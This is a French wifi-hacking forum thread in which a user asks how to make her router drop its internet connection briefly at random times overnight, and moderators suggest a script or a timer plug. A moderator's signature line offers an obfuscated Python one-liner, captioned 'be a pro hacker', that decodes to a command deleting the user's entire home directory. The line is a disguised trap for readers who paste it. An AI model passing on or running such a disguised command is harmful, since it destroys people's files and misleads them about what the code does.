Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-07-2012 17:17:16

Sophie67
N00b

Configuration et choix routeur pour reset connection internet

Bonjour,
J'ai actuellement un abonnement internet avec neuf sfr et neufbox NB4.
Peu importe les raisons je souhaite juste savoir si c'est faisable et comment : je souhaite couper ma connexion internet de façon aléatoire pendant quelques secondes et cela plusieurs fois de suite entre 1H00 et 6H00 du matin par exemple. Sur la neufbox ce n'est pas possible.
Avant d'investir dans un routeur wifi sous linux genre WRT54GL ou autres? je souhaite savoir si cette fonction existe et pour quel modèle de routeur?

Merci

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-08-2012 19:51:27

spawn
Modérateur

Re : Configuration et choix routeur pour reset connection internet

Cette fonction n'existe pas, mais un script qui la fait ne dois pas être dur à faire.

Et puis, une prise 220V avec un cadran horaire pour couper le courant de la box de temps en temps la nuit ça coute 10€, j'en ai un pour mon frigo qui fait du bruit.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 08-08-2012 20:35:01

M1ck3y
Administrateur
Lieu : Lost in the darkness

spawn a écrit :

Et puis, une prise 220V avec un cadran horaire pour couper le courant de la box de temps en temps la nuit ça coute 10€, j'en ai un pour mon frigo qui fait du bruit.

C'est exactement ce que je me suis dit en lisant la question, mais comme la demande était "pendant quelques secondes", je n'ai pas répondu car il me semble que ces trucs marchent par plage d'un quart d'heure ou d'une demi heure, non?

#4 09-08-2012 08:41:39

goliate
Membre Irremplaçable
Site Web

M1ck3y a écrit :
spawn a écrit :

C'est exactement ce que je me suis dit en lisant la question, mais comme la demande était "pendant quelques secondes", je n'ai pas répondu car il me semble que ces trucs marchent par plage d'un quart d'heure ou d'une demi heure, non?

Tu doit en avoir aussi des numerique que tu doit pouvoir faire fonctionner sur des plages de 5min,mais même si il met un programateur (car c'est comme sa que sa s'appelle ^^), le temps que sa box reboot une foit que le courant et revenue, il n'aurat surment pas accé au net.

Je c'est que sa n'est pas trés clair mais je ne trouve pas les mots,sinon Sophie67 , je ne pense pas que cela soit possible, mais je voulais savoir pourquoi vouloir faire sa?

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Annonce